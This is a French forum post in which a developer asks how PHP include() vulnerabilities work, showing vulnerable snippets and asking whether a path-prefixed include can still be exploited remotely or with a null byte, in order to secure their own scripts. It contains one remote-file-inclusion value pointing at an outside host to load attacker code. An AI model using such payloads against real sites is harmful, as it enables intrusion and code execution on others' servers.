Bonjour Bonjour 
J'ai un petit soucis. enfin pour être exact, c'est un problème de compréhension.
Imaginons tout d'abbord ce bout de code:
<?php include($page.".php");?>
Tout le monde serra d'accord pour dire qu'exploiter ce genre de faille est dans le simplissime (par exemple $page = http://server.com/hack/test.txt?)
mais si on prends plus "compliqué":
include("dossier1/dossier2/".$page.".php")
Bon, ok!
On peut déjà en tirer pas mal de chose, fichier de conf du serveur ou page senssible. Mais il est pas possible de faire, comme dans le premier exemple, un exploit par un serveur externe ?
Ou y a t'il un caractère nul qui permet de ne pas prendre en compte ce qu'il y a avant la variable ?
ce point de détails me traumatise dans la sécurisation de mes scripts ^^
Edit: Ah oui! pour ceux qui ne voudrais pas répondre par-ce que ça fais techniquement partit du hacking, je voudrais juste savoir si c'est possible ou non, un exemple d'exploit m'aiderais a comprendre comment, mais ce n'est pas le plus important
Faille Include
Répondre avec citation
Partager